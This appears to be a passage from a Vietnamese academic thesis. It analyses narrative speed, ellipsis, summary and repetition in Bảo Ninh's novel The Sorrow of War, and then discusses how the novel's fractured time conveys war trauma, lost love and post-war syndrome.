Có thể thấy, tiểu thuyết Nỗi buồn chiến tranh, mặc dù xét trên tổng thể tốc độ trần thuật là tương đối chậm. Song tốc độ đó không phải được duy trì ổn định với sự trung bình trên tất cả các sự kiện, tình huống truyện. Qua khảo sát Nỗi buồn chiến tranh, chúng tôi nhận thấy có những đoạn sự kiện được kể với tốc độ chậm, kéo dài. Song ngược lại, ở nhiều sự kiện tốc độ kể chuyện lại gia tăng đáng kể. Việc gia tốc thời gian không có nghĩa là làm cho tốc độ kể chuyện xét trên tổng thể trở nên nhanh hơn mà điều đó chỉ góp phần tạo nên nhịp điệu kể truyện cho tác phẩm.

Để tạo nên sự gia tốc thời gian đó phải kể đến vai trò của những tỉnh lượclược thuật. Hiện tượng này làm đảo ngược độ chênh giữa thời gian sự kiện và thời gian kể. Do đó, “thời gian kể co dần lại trong khi thời gian sự kiện bắt đầu có sự gấp khúc, chùng xuống kéo theo sự gia tốc trong trần thuật. Câu chuyện vận động về phía trước với “vận tốc” ngày một tăng” [23,54].

Tỉnh lược là “cách tạo ra gia tốc cực nhanh cho câu chuyện” [23,44]. Những tỉnh lược trong Nỗi buồn chiến tranh được Bảo Ninh sử dụng theo khuynh hướng khái quát, chắt lọc và dồn nén sự kiện. Trong một quãng thời gian nào đó của câu chuyện, người kể chuyện thuật lại ngắn gọn các sự kiện quan trọng theo hình thức đan cài, lồng ghép, đồng hiện và dồn chúng lại trong một số ít dòng sự kiện thông qua dòng hồi tưởng của nhân vật chính – Kiên.

Trong Nỗi buồn chiến tranh, chỉ với độ dài 1 trang rưỡi văn bản (từ trang 33 đến trang 34) mà chứa đựng dồn dập bao nhiêu hồi ức, cảm giác, ấn tượng: “hồn ma”, “đêm kì ảo lạ lùng”, “giấc mơ dài”, “truông Gọi Hồn”, “tiếng hú buồn đau và ghê rợn vang lên từ tiềm thức”, “tiếng gọi của tình yêu”, “mối tình cuồng si bí ẩn và đầy tội lỗi”…. Những đối tượng ấy tưởng như thuộc về những lĩnh vực rất cách xa nhau trong đời sống, giờ đây xích lại gần, hòa trộn vào trong nhau. Mạch văn chuyển dịch một cách gấp gáp, nhịp điệu câu văn từ đó mà nhanh dần, đã giúp tác giả trình bày hàng loạt những câu chuyện còn dang dở, những chi tiết bị bỏ lửng… Nó góp phần gợi ra hình ảnh một hiện thực bị nghiền nát vụn vỡ và bất trắc.

Trong dòng hồi ức miên man bất định của Kiên: những đoạn đời, những kỉ niệm, những bức tranh phong cảnh, những hình ảnh người phụ nữ cứ lần lượt kế tiếp hiện về. Lúc này, dạng thức tỉnh lược được sử dụng hiệu quả: “Kí ức về một trưa mùa khô rực rỡ nắng, hoa nở đầy trong những khoảnh rừng thưa… Kí ức một ngày mưa gian truân bên bờ Sa Thầy vào rừng hái măng đào củ… Những gương mặt đàn bà mến thương xa lạ gợi niềm nhớ nhung âu yếm… Niềm đau của mối tình… Kí ức xa vời, trập trùng và lặng lẽ, khắc nghiệt và thẳm sâu như rừng như núi trong lòng anh chiều ấy…” . Thời gian như được co lại trong các sự kiện nối đuôi nhau. Việc tập trung chủ yếu vào các sự kiện và bỏ qua kĩ thuật miêu tả là cơ sở xác định tốc độ trần thuật nhanh của truyện kể.

Trong Nỗi buồn chiến tranh, khoảng cách giữa thời gian tự sự và thời gian sự kiện không đồng đều giữa các đoạn tình tiết của câu chuyện với nhau. So với thời gian câu chuyện thì gian tự sự có khi gia tốc. Gia tốc ở những chỗ tỉnh lược – thường là những đoạn mà trí nhớ của Kiên lướt nhanh qua những vùng hồi ức: “Giữa những cảnh chiến tranh trong mơ đôi khi Kiên vẫn thấy thoáng lên những cảnh sinh hoạt và lao động của đời lính B3. Mùa khô phá rẫy đốt nương. Mùa mưa làm cỏ úa. Mùa mưa vào rừng nhặt măng hái nấm. Mùa khô giăng lưới bắt cá, đặt bẫy săn thú. Mùa khô đi gùi.”.

Trong Nỗi buồn chiến tranh, đồng hiện không gian, thời gian cũng góp phần làm gia tăng tốc độ trần thuật: “Nhiều hôm không đâu giữa phố xá đông người tôi đi lạc vào một giấc mơ khi tỉnh. Mùi hôi hám pha tạp của đường phố bị cảm giác nống lên thành mùi thối giữa. Tôi tưởng mình đang đi qua đồi “Xáo Thịt” la liệt người chết sau trận xáp lá cà tắm máu cuối tháng Chạp 72 (…). Có đêm tôi giật mình thức dậy nghe tiếng quạt trần hóa thành tiếng rú rít rợn gáy của trực thăng vũ trang. Thót người lại trên giường tôi nín thở đợi một trái hỏa tiễn từ tàu rà phụt xuống” . Ba khoảng không gian, thời gian cách xa nhau (đường phố hiện tại – đồi Xáo Thịt năm 1972 – căn phòng hiện tại) cùng xuất hiện trong một đoạn văn ngắn đã chứng tỏ ưu thế của dạng thức tỉnh lược. Nó không những làm cho tốc độ trần thuật, thời gian diễn tiến nhanh hơn mà còn gợi lại những cảnh tượng kinh hoàng của chiến trận, đồng thời diễn tả hội chứng chiến tranh khủng khiếp trong tâm hồn Kiên.

Lược thuật cũng làm cho tốc độ kể chuyện gia tăng nhưng không đạt đến cực đại như trong tỉnh lược. Lược thuật – “sự thuật lại trong một vài đoạn, vài trang sự tồn tại của một vài ngày, vài tháng, vài năm mà không có những chi tiết của hành động lời nói” [53,51]. Trong 8 trang văn bản Nỗi buồn chiến tranh (từ trang 99 đến trang 106) mà thể hiện được những phức hợp nhận thức đau xót, mất mát, đắng cay, thất vọng… của cả một đời người: Gặp Phương sau mười năm chiến tranh, quãng đời chung sống đau đớn của hai người, Kiên thấy mình “đang bị mắc kẹt trên cõi đời này”. Phương bỏ đi, Kiên cảm nhận rõ “thiên mệnh của đời mình: sống ngược trở lại, lần tìm trở lại con đường của mối tình xưa, chiến đấu lại cuộc chiến đấu”  [45,102]. “Chỉ kể lại rất ít những sự kiện chính trong một thời gian tương đối dài, đó chính là cách kể lược thuật của người kể chuyện” [2,79].

        Sự tham gia của các tỉnh lược lược thuật khiến thời gian tự sự trong Nỗi buồn chiến tranh dường như trôi nhanh hơn. Tỉnh lược và lược thuật xuất hiện rải rác, chúng nhiều khi đan xen vào nhau khó có thể bóc tách được rõ ràng.

Tần suất

Mối quan hệ giữa thời gian của câu chuyện và thời gian của truyện kể còn được xem xét ở một khía cạnh khác. Đó là quan hệ về các sự kiện xuất hiện (nhiều hoặc ít trong câu chuyện và số lần mà chúng được kể lại trong truyện). Genette gọi đây là tần suất kể chuyện và phân ra thành các loại quan hệ:

Trần thuật đơn nhất: là cách kể lại một lần những sự việc xảy ra một lần, hoặc kể lại n lần những sự việc xảy ra n lần.

Trần thuật trùng lặp:  kể lại n lần những sự việc xảy ra một lần.

       – Trần thuật khái quát: kể lại một lần những sự việc xảy ra n lần.

Qua khảo sát Nỗi buồn chiến tranh, chúng tôi nhận thấy kiểu trần thuật trùng lặp xuất hiện phổ biến trong tác phẩm. Trần thuật trùng lặp được xác định khi “sự việc xảy ra một lần được kể lại nhiều lần, với điều kiện giữa cái được lặp đi lặp lại nhiều lần ấy với sự việc ban đầu phải có quan hệ đồng dạng” [3,78]. Việc nghiên cứu tần suất, sự lặp lại trong Nỗi buồn chiến tranh được biểu hiện trên các bình diện: biểu tượng, mô típ, hình ảnh (mưa, đêm, cái chết, giấc mơ), nhân vật, từ ngữ, cú pháp… Tuy nhiên, chúng tôi không tham vọng tìm hiểu hết các bình diện đó mà chỉ tập trung đi sâu vào nghiên cứu sự lặp lại của biểu tượng đêm với mô típ giấc mơ và số lần các sự kiện nhân vật xuất hiện trong tác phẩm.

Nỗi buồn chiến tranh là dòng hồi ức của nhân vật Kiên về con người trong chiến tranh, vì vậy các sự kiện được bộc lộ chủ yếu thông qua dòng ý thức, dòng tâm tư của nhân vật. Đêm chính là khoảng thời gian thích hợp nhất để con người sống với thế giới vô thức, thế giới tâm linh, tiềm thức của mình; bóng đêm là cái nền để mơ những giấc mơ về quá khứ bất tận. Qua khảo sát Nỗi buồn chiến tranh, chúng tôi nhận thấy biểu tượng đêm (tên gọi cùng với các biến thể của nó) và mô típ giấc mơ được lặp lại với tần số khá cao trong tác phẩm.

Bảng 1.2

Bảng thống kê tần số xuất hiện

biểu tượng đêm và mô típ giấc mơ trong Nỗi buồn chiến tranh (Bảo Ninh)

 

Tác phẩm

Tổng số trang

 

Tần số xuất hiện
 

Nỗi buồn chiến tranh

 

312

Đêm

299

Giấc mơ

111

 

Theo dõi bảng thống kê trên, ta thấy tiểu thuyết Nỗi buồn chiến tranh dày đặc biểu tượng đêm và mô típ giấc mơ, nó diễn tả nỗi buồn triền miên vô tận trong trong tâm hồn Kiên. Cứ mỗi lần đêm buông là chuỗi kí ức lại hiện về. Bóng đêm không chỉ phủ trùm hầu hết giấc mơ của nhân vật mà nó còn gắn liền với sự kiện chính diễn ra trong cuộc đời Kiên. Dưới đây, chúng tôi dẫn ra một số những chi tiết, sự kiện chính để thấy được sự lặp lại của biểu tượng đêm và mô típ giấc mơ xuất hiện trong trong tác phẩm.

(1) “Đêm, thật lạ lùng, một đêm có lẽ là kì ảo nhất trong bao đêm tối của đời anh. Gần như toàn bộ cuộc đời chiến đấu với cả một đạo quân những người đã chết mà anh từng gặp gỡ trong chiến trận đã trở về với anh qua những cánh cửa vòm cuốn mờ tối của giấc mơ dài không dứt” .

(2) “Về đêm… khi ngủ… những giấc mơ đậm đặc cảm giác, nóng bỏng và ngọt lịm như mật ứa ra trào lên lấp đầy cõi mộng mị. Trong những đêm mưa ấy, kí ức về Phương hiện lên và bước tới với anh trong bóng hình tiên nữ mờ ảo”.

(3) “Một đêm khác, cũng trong mơ, tôi nhìn thấy truông Gọi Hồn và mơ thấy Hòa, cô giao liên xinh tươi, người Hải Hậu đã hi sinh vào thủa tối tăm mịt mù năm 68”.

(4) “Khi phát hiện ra cuộc tình bi thảm đầy sàm báng và tuyệt vọng của đồng đội với ba cô gái bị bỏ quên giữa rừng sâu, Kiên đêm nào cũng mơ tới Phương” .

(5) “Hằng đêm anh miệt mài mê mẩn chìm trong cái vuốt ve vô tận của mộng mị. Ngay cả khi bên cạnh có một cô gái đang trở mình áp sát vào anh trong giấc ngủ thì nhắm mắt lại anh vẫn khác khoải nhớ tới Phương” .

(6) “Kể từ ngày Phương từ bỏ anh, hằng đêm Kiên mất ngủ vì những chuỗi dài giấc mơ kể lại chính cuộc đời anh. Vô tận những đoạn đời khác biệt, so le nhau hàng năm trời và đột ngột hiện ra cùng một lúc, đan xen…” .

       Thời gian đêm không chỉ được khơi gợi trong từ ngữ mà những chi tiết, sự kiện, hoạt động của nhân vật cũng nhuốm màu đêm. Chỉ trong thời điểm ban đêm, con người mới thực sự trở về với chính mình, mới có thể chìm sâu vào những giấc mơ trùng điệp, bất tận mà không một thế lực, sức mạnh nào có thể động được tới cõi thẳm sâu, huyền bí mộng mị ấy. Đêm như là thời gian sống của Kiên, bởi lẽ hiện tại đối với anh chỉ là những chuỗi ngày vô nghĩa. Không hòa hợp được với cuộc sống thực tại, anh tìm đến thế giới tâm linh, thế giới của những hoài niệm, mơ tưởng.

        Nếu những giấc mơ trong Chinatown (Thuận) là kết quả của chuỗi ẩn ức không thể giải tỏa hoặc vô số hoang tưởng mộng mị cực độ của nhân vật thì trong Nỗi buồn chiến tranh, giấc mơ thường bắt đầu từ ám ảnh có thật, từ sự kiện có thật mà nhân vật đã đi qua và nếm trải. Nếu trong Chinatown, những giấc mơ hầu hết là ảo ảnh đẹp đẽ thì trong Nỗi buồn chiến tranh, mỗi giấc mơ là những “cơn ác mộng giợn người kinh khủng như những liều thuốc độc”. Nó gắn liền với những sự kiện về cái chết (giấc mơ về truông Gọi Hồn; giấc mơ về cái chết của ba cô gái Thơm, Mây, Hơ-bia; giấc mơ về Hòa – nữ giao liên tự nguyện hi sinh vì anh…), cho thấy thời gian sống của Kiên chủ yếu là mộng mị nặng nề, bị ám ảnh bởi những cái chết mà anh đã tận mắt chứng kiến, nó còn là nỗi xót xa, niềm thương cảm cho những số phận con người nhỏ bé mong manh trước chiến tranh. Đồng thời phơi bày sự khốc liệt bạo tàn phi nhân tính của nó.

Tuy nhiên, ám ảnh và đau xót nhất là những giấc mơ của Kiên về Phương, nó bao choán lấy tâm hồn Kiên: “Kiên đêm nào cũng mơ thấy Phương”. Dòng trôi của tâm trạng không bằng lặng, một chiều mà phức tạp, nỗi ngọt ngào xen lẫn niềm cay đắng. Đoạn trước của tiểu thuyết ta bắt gặp chân dung Phương 17 tuổi, ngay sau đó đã trở thành một người đàn bà tuyệt vọng, rồi đột ngột hiện ra hình ảnh một cô bé 13 tuổi, rồi 16, 17 tuổi với một sắc đẹp liều lĩnh và bất kham. Những hình ảnh đó gắn liền với những kí ức, những ấn tượng đã đi vào Kiên như vết hằn khó phai. Có thể nói, ám ảnh của quá khứ, của kí ức về chiến tranh, tình yêu khiến anh đang dần mất đi mối liên hệ với thực tại. Nhiều khi anh cảm thấy mình như kẻ bị mắc kẹt lại giữa cõi đời này. Nhưng chính kí ức, giấc mơ lại là cuộc sống của riêng anh, giúp anh “thoát khỏi vô tận những tấn trò đời hôm nay” .

Như vậy, thời gian đêm với những “giấc mơ ban ngày”, “giấc mơ mở mắt” xuất hiện với tần số khá cao trong tác phẩm với nhiều dạng vẻ khác nhau nhưng đều nhằm thể hiện một dòng chảy của ý thức rối bời, miên man bất định của nhân vật. Những giấc mơ thác loạn, chập chờn, đứt đoạn và rối tung của nhân vật biểu hiện cho một thế giới tâm lí đầy những ẩn ức, dằn vặt khủng khiếp.

Ngoài ra, sự lặp đi lặp lại thời gian đêm (cũng như những biến thể của nó: bóng tối, tối tăm, tối khuya, mịt mù…) cùng với mô típ giấc mơ tạo nên nhịp điệu thời gian đặc sắc cho tiểu thuyết Nỗi buồn chiến tranh.

Nỗi buồn chiến tranh được thêu dệt nên bởi hàng loạt những giấc mơ đứt nối, những hồi tưởng gấp khúc, hỗn loạn của nhân vật chính – Kiên. Vì vậy, các sự kiện không được kể một cách mạch lạc theo trật tự thời gian tuyến tính mà diễn ra lộn xộn thông qua dòng hồi tưởng. Nhiều sự kiện được lặp lại nhiều lần như một nỗi ám ảnh: sự kiện Kiên cùng Phương trên tàu xuất hiện ba lần; Hoà  cô giao liên năm xưa hai lần; Hiền  chiến sĩ phế binh hai lần… Nhưng mỗi lần là một vùng kỉ niệm, sự kiện sau không phải là sự lặp lại của sự kiện trước mà là sự mở rộng.

        Kí ức về Hòa – nữ giao liên, là một nỗi ám ảnh, day dứt trong lòng Kiên được kể hai lần ở những điểm nhìn khác nhau nhưng đều chung một tâm trạng buồn, đau đớn, xót xa khi nghĩ về Hoà.

        (1) Một đêm, trong giấc mơ trở lại truông Gọi Hồn, Kiên đã mơ thấy Hoà – cô giao liên xinh tươi, người Hải Hậu: “trong màn sương mù dày đặc của giấc mơ, tôi chỉ thấy Hoà thấp thoáng, xa vời nhưng với một tình yêu, một niềm đắm say và cảm giác gần gũi da diết”; cảnh tượng Hoà gục ngã giữa trảng cỏ và một bầy Mỹ xô tới .

        (2) Kí ức đau thương về Hoà lấy cái chết để giải cứu cho Kiên và các thương binh: tình cảnh đoàn cáng thương; tình hình lục sùng của địch; Hòa và Kiên tìm đường “bằng mọi giá phải tìm được đường ra sông”; phát hiện có địch; Hoà xông lên đánh lạc hướng, nhử địch về phía mình cho Kiên và đồng đội thoát chạy “Hòa đứng hơi nghiêng trước nắng tà nên thân hình mảnh mai nổi lên đậm nét với những đường cong sẫm tối và những vệt da bắt sáng. Mái tóc xõa trên vai. Cái cổ cao yếu ớt, áo cộc, quần đùi, đôi chân trần đầy vết gai cào”; địch đuổi theo và giết Hoà.

        Như vậy, giữa blog sự kiện (1) và blog sự kiện (2) không phải là sự kế tiếp mà là một sự mở rộng. Đọc xong blog sự kiện (1), người đọc dường như không nghĩ và chờ đợi thêm (vì nó như là một sự trọn vẹn trong phạm vi về sự kiện). Nhưng đến blog sự kiện (2), người đọc lại được biết thêm thông tin, rõ hơn về sự kiện – đức tính hi sinh thầm lặng của Hòa, lấy cái chết để giải cứu cho Kiên và các thương binh. Mỗi blog sự kiện được hình thành bởi một nguyên nhân, nếu blog (1) nguyên nhân từ những giấc mơ về truông Gọi Hồn thời Mậu Thân thì blog (2) lại là những hồi tưởng về những cái chết của đồng đội để cứu sống Kiên. Mỗi một blog sự kiện được tái hiện trong những hoàn cảnh khác nhau, bởi những nguyên nhân khác nhau còn góp phần soi sáng bản chất con người, thể hiện một cách khách quan nhất bản chất, tính cách của nhân vật mà không cần phán xét.

Hay sự kiện Kiên cùng Phương trên tàu xuất hiện ba lần. Những trần thuật trùng lặp của nhân vật đều xuất hiện dưới dạng độc thoại nội tâm:

(1) “Anh chẳng sợ gì cái chết. Cái chết không đáng sợ, chỉ buồn thôi, và nó trĩu nặng nhưng dang dở cùng những tiếc nuối” .

(2) “Tất nhiên đã muộn rồi. Mối tình đã trở thành một cái gì vô phương cứu vãn trong đời. Cho nên nếu đã ước như thế thì phải nói là giá mà không lớn lên ở bên nhau, giá mà không có tình cảm mến thương âu yếm của tuổi học trò, không cùng nhau một thời thơ ấu, một lứa bạn bè. Có biết bao cánh cửa như thế mà lẽ ra nếu kịp khép lại thì những bước đi vu vơ của tuổi trẻ đã không thể đưa số phận mối tình trôi xa, cuốn nó tới vực thẳm này” ..

(3) “Phải, đó là những chuyện đã hoàn toàn quên mà còn nhớ mãi” .

Câu chuyện Phương và Kiên ở nhà ga Thanh Hóa trong chuyến tàu hành quân vào Nam được phân ra thành ba mảnh vỡ xuất hiện xen kẽ không đồng thời mà nó đứt gãy cùng với kí ức của Kiên. Chuyến tàu chở Kiên và Phương vào ga Thanh Hóa đã đưa họ đi nốt những cây số cuối cùng của mối tình đầu, nhưng đồng thời nó cũng chở hai người cập bến một cuộc chiến tranh vô cùng tàn khốc. Trong hồi ức của Kiên, chuyến tàu định mệnh ấy chính là bước ngoặt số phận của hai người, gạch nối giữa hòa bình và chiến tranh, giữa một mối tình đắm say mãnh liệt thành chia li, “dang dở cùng những tiếc nuối”. Cứ mỗi lần nhớ về Phương, về những kỉ niệm tình yêu ngọt ngào là “hiện lên trước mắt Kiên nhà ga Thanh Hóa ngày ấy”.

   
 
   
   
   
   
   
   
   
   
   

Qua việc nghiên cứu cách tổ chức thời gian tự sự trong Nỗi buồn chiến tranh, trên cơ sở ứng dụng lý thuyết thời gian tự sự của Genette (trật tự thời gian, tốc độ tần suất), chúng tôi rút ra một số vấn đề như sau:

Nỗi buồn chiến tranh là hồi ức của nhân vật chính – Kiên về con người trong chiến tranh. Do tính chất hồi ức nên vấn đề thời gian ở đây được thể hiện rất đậm đặc. Thời gian trong tác phẩm không được trình bày theo tiến trình thời gian lịch sử mà luôn có sự đảo lộn, đứt gãy không ngừng.

Trong dòng chảy biên niên của những biến cố xuất hiện nhiều nhánh rẽ, sai trật niên biểu, lối đảo thuậtdự thuật cũng có mặt để phủ kín lên trật tự thời gian niên biểu của truyện kể.

Tốc độ trần thuật trung bình của truyện kể khá chậm. Chính từ tốc độ truyện kể này đã tạo cho nhịp kể của truyện một tính chất hồi cố, trăn trở, góp phần thể hiện cảm xúc, sự suy ngẫm của nhân vật Kiên trong hành trình “đi tìm thời gian đã mất”.

Tính chất lặp đi lặp lại của truyện kể một mặt có ý nghĩa biểu trưng, nhấn mạnh; mặt khác tạo nên nhịp điệu cho toàn bộ tiểu thuyết Nỗi buồn chiến tranh.

   

HiỆU QUẢ NGHỆ THUẬT CỦA THỜI GIAN TỰ SỰ TRONG NỖI BUỒN CHIẾN TRANH

Dòng thời gian đứt gãy, xáo trộn – những ám ảnh, day dứt về hiện thực

        Hiện thực chiến tranh tàn khốc, hủy diệt

Trong Nỗi buồn chiến tranh, nhà văn đã để cho nhân vật Kiên, người lính trinh sát năm xưa và nay trở về là “nhà văn của phường” kể về “cuộc chiến của riêng anh”, một cuộc chiến “hoàn toàn khác với cuộc chiến đấu chung” từng được mọi người biết tới. Cứ mỗi lần kí ức chiến tranh hiện về, tâm hồn Kiên luôn bị ám ảnh, day dứt không nguôi bởi sự tàn khốc, hủy diệt của chiến tranh. Chiến tranh không chỉ để lại nỗi đau thể xác mà nó còn để lại nỗi đau  tinh thần dai dẳng cho con người, không chỉ ở một thế hệ, nó để lại một nỗi đau “truyền kiếp”.

Chiến tranh đồng nghĩa với cái chết và sự hủy diệt sự sống của con người

Có thể nói, chiến tranh hiện hình trên những trang viết của anh là một thế giới “đầy rẫy những tử thi”. Những chi tiết khủng khiếp được miêu tả trong Nỗi buồn chiến tranh, đã khiến nhiều người hiểu sai lệch ý đồ của tác giả theo cái nhìn chính trị hóa văn chương. Thực ra, chủ đề chiến tranh trong tiểu thuyết này đã vượt ra khỏi ý nghĩa miêu tả thông thường, trở thành biểu tượng khái quát nhất của Nỗi buồn chiến tranh, góp phần làm nên giá trị nhân văn cao đẹp cho tác phẩm.

Tình yêu – một trong những tình cảm đẹp đẽ nhất của con người cũng không thoát khỏi sự vùi dập của chiến tranh

Đó là kí ức về mối tình đau xót giữa Kiên và Phương trên con tàu định mệnh năm xưa. Tiếng gầm rú đầu tiên của máy bay như một tiếng còi dài của chiến tranh vang lên đã làm họ lạc mất nhau giữa đêm tối của chiến trận hoang vu. Trước mắt Kiên và Phương – hai tâm hồn trắng trong, chưa vướng bụi đời đã bị cuốn vào cảnh tàn phá dữ dội của bom đạn. Hình ảnh Phương gặp nạn trên con tàu định mệnh là một chân dung đau xót về sự mất mát của tình yêu. Phương đánh mất đời người con gái, cùng một lúc cô mang hai vết thương: vết thương trên thân thể và vết thương trong tâm hồn: “một gương mặt lạ lẫm hầu như không quen biết, ngực áo cộc tay mở hết cúc, cổ bị những vết cào xước, môi bầm dập và không nói (…), cái nhìn trừng trừng như vô cảm, lửng lơ xa lạ”.

Những suy nghĩ của Kiên trước những biểu hiện khác thường của Phương sau khi cô “bị cướp” đi sự trong trắng trên chuyến tàu định mệnh năm xưa đã cho thấy vết rạn nứt trong tình cảm của họ:

“Thì ra những tai họa ráng xuống đời hai đứa, đối với Phương có vẻ không hề là tai họa. Trái lại dường như nàng chỉ coi đó là những yếu tố mới trong cuộc sống mà nàng sẵn sàng đón nhận và thích nghi” .

“Hẳn rằng lúc này, Phương hoàn toàn chẳng còn thiết gì nữa, tuyệt đối buông thả, tuyệt đối không còn biết sợ là gì nữa. Kiên nghĩ” .

“Một cách vô phương cứu vãn, từ một người bạn gái tươi đẹp, luôn tha thiết, luôn luôn đằm thắm. Phương của anh Kiên nghĩ Trong phút chốc biến thành một người đàn bà khác hẳn, xiết bao xa lạ đối với anh, một người đàn bà từng trải đã gạt mọi ảo tưởng và đã tan biến niềm hi vọng, lạnh nhạt vô tình, dửng dưng với tất thảy, với bản thân nàng, với anh, với quá khứ, với cảnh ngộ tang thương, đau khổ của mọi người…” .

Có thể nói, những dòng suy nghĩ của Kiên về Phương như vậy, cho chúng ta thấy giữa họ có một khoảng cách vô hình. Chiến tranh như một nhát cắt phũ phàng của số phận đẩy tình yêu của họ ra hai cực trên chuyến tàu định mệnh. Bắt đầu từ đây cuộc đời Kiên chìm trong máu lửa, thương đau và thất bại. Họ vĩnh viễn mất đi tình yêu trong sáng tuổi 17. Ngày Kiên trở về tình cảm của họ chỉ còn là nỗi thống khổ của hai con người chịu nhiều tổn thương trong chiến tranh, “kí ức chẳng buông tha, chúng mình đã lầm tưởng có thể vượt qua được một hạt sạn? không phải là hạt sạn mà là một trái núi…”. Lời nói của Phương lúc nàng ra đi là một lời thú nhận cuối cùng. Họ vĩnh viễn mất nhau, số phận cay đắng cho tình yêu đầu đời của hai người sau chiến tranh không thể nào hàn gắn nổi.

 

       Hiện thực tâm hồn bị chấn thương nặng nề sau chiến tranh  

Bảo Ninh với tiểu thuyết Nỗi buồn chiến tranh, đã thể hiện rất thành công bi kịch của những người lính sau chiến tranh – “hội chứng sau chiến tranh”. Bằng việc đi sâu khám phá những dư chấn của chiến tranh làm ảnh hưởng đến cuộc sống thời hậu chiến của người lính, Bảo Ninh đã đem đến cho người đọc một cái nhìn sâu sắc và toàn diện hơn về nhân vật. Trần Đình Sử đọc Nỗi buồn chiến tranhnhìn trên phương diện hiện thực chiến tranh đã nhận xét: “Tiểu thuyết Nỗi buồn chiến tranh của Bảo Ninh đã kể lại cuộc chiến tranh với tất cả tính chất chiến tranh của nó. Những tính chất không chỉ thể hiện ở cái chết nơi chiến trận, mà còn mở rộng ra thành cái chết trong tâm hồn, tình yêu, thành mọi sự dở dang” [42,17].

Trong Nỗi buồn chiến tranh, Kiên may mắn là người duy nhất của đội trinh sát có mặt trong ngày chiến thắng nhưng ngay trong ngày ấy, Kiên đã không có được tâm trạng hân hoan, hạnh phúc như người ta vẫn nói về ngày đầu tiên thống nhất đất nước. Ngay từ lúc này đây, Kiên đã “đột nhiên thấy tràn ngập cảm giác cô đơn trơ trọi. Trơ trọi hơn bao giờ hết, trơ trọi từ đây”. Điều đó được khẳng định thêm bằng những câu hỏi thể hiện nỗi băn khoăn day dứt của anh mỗi khi được nghe người ta kể hoặc được xem phim, được thấy cảnh 30 tháng 4 ở Sài Gòn trên màn ảnh:

“Cũng như họ, cũng trải qua những cảnh tượng không thể nào quên của chiến thắng, mà đám lính chiến tụi anh lại không có được tâm trạng sáng choang, bay bổng, ào ào sướng vui như họ là cớ làm sao? Tại sao cảm giác ngột ngạt lại đến với bọn anh quá sớm như thế, hầu như là chưa nhấc kịp chân ra khỏi chiến hào nữa kìa?”.

Việc Kiên không thể có được tâm trạng “sáng choang, bay bổng, ào ào sướng vui” trong ngày chiến thắng, bởi lẽ lúc này trong tâm thức anh đã cảm nhận được cái giá của ngày chiến thắng: “ra đi cùng với ba chục năm trường chiến trận là cả một thời, là cả một thế giới với biết bao nhiêu là cuộc đời và số phận, là sự sụp đổ của cả một góc trời cùng đất đai và sông núi” . Anh mang trong mình mặc cảm sống sót:“khi anh và tôi thì sống còn những người ưu tú nhất, tốt đẹp nhất, những người xứng đáng hơn ai hết quyền sống trên cõi dương này đều gục ngã, bị cỗ máy đẫm máu của chiến trận chà đạp, đày đọa (…) thì sự bình yên này, cuộc sống này, cảnh trời êm biển lặng này là cả một nghịch lí quái gở” .

Theo thời gian, cảm giác ngột ngạt trong ngày chiến thắng chẳng những không nguôi ngoai mà ngày càng trở nên nặng nề. Những kỉ niệm, những dư chấn dai dẳng về cuộc chiến tranh, dù anh muốn quên đi, dù anh biết rằng “lẽ ra phải khuyên mọi người hãy quên đi” nhưng chính anh cũng biết “quên thật là khó”. Kiên nghĩ “không biết đến bao giờ lòng mình có thể nguôi quên, trái tim mới có thể thoát khỏi gọng bàn tay xiết chặt của những kỉ niệm về chiến tranh năm xưa” , những kỉ niệm có thể là êm đềm có thể là ác hại nhưng đều để lại vết thương mà cho dù năm tháng qua đi nó vẫn còn đau, đau mãi trong lòng anh mà không có một giây phút nào bình lặng. Cái không gian rộng lớn của quá khứ vẫn cứ đeo bám anh, biết bao kỉ niệm bi thảm, bao nhiêu nỗi đau mà từ lâu Kiên phải cố gắng quên đi, vậy mà rốt cuộc đều bị lay thức bởi chấn động của kí ức. Chiến tranh đã chặt lìa cuộc đời Kiên thành hai mảnh không thể chắp nối lại được như cũ (một mảnh là Kiên của tuổi 17 trẻ trung, trong sáng và một mảnh là Kiên của tuổi 40 luống tuổi, hết thời, trống rỗng, buồn đau…). Quá khứ chiến tranh luôn hiện diện, ám ảnh Kiên suốt cuộc đời hậu chiến u buồn: “Trở về sau chiến tranh, cho đến bây giờ tôi đã phải chịu đựng hết hồi ức này đến hồi ức khác, ngày này qua ngày khác, đêm thâu này qua đêm thâu kia thử hỏi đã bao nhiêu năm ròng?”. Anh không thể tự làm chủ được tâm hồn mình nữa. Những kí ức về chiến tranh dữ dội thường bất chợt ập đến làm Kiên luôn sống trong hoảng loạn. Liệu có bao nhiêu người trên trái đất này phải trải qua những giấc mơ giữa ban ngày khủng khiếp như Kiên: “Nhiều hôm không đâu giữa phố xá đông người tôi đi lạc vào một giấc mơ khi tỉnh. Mùi hôi hám pha tạp của đường phố bị cảm giác nống lên thành mùi thối giữa. Tôi tưởng mình đang đi qua đồi “Xáo Thịt” la liệt người chết sau trận xáp lá cà tắm máu cuối tháng Chạp 72” . Hiện tại bị biến thành quá khứ, hòa bình bị hình bóng chiến tranh xua tan biến, Kiên hoàn toàn đánh mất hiện tại: “Có đêm tôi giật mình thức dậy nghe tiếng quạt trần hóa thành tiếng rú rít rợn gáy của trực thăng vũ trang. Thót người lại trên giường tôi nín thở đợi một trái hỏa tiễn từ tàu rà phụt xuống (…) Tôi như sẵn sàng nhập thân trở lại với cảnh lửa, cảnh máu, những cảnh chém giết cuồng dại, méo xệch tâm hồn và nhân dạng” . Dấu ấn sâu đậm của quá khứ khiến những con người như Kiên không tài nào nhấc chân ra khỏi miệng hố của chiến tranh. Dù đã trở về nhưng anh không thể hòa nhập được với cuộc sống hiện tại và càng ngày “Kiên càng có cảm giác rằng: không phải là mình đang sống mà là bị mắc kẹt trên cõi đời này”. Theo cách nói của nhân vật Lực trong Cỏ Lau (Nguyễn Minh Châu) thì cuộc đời anh đã bị chiến tranh như một nhát dao phạt ngang thành hai nửa không lìa hẳn nhưng cũng không thể gắn liền lại như cũ.

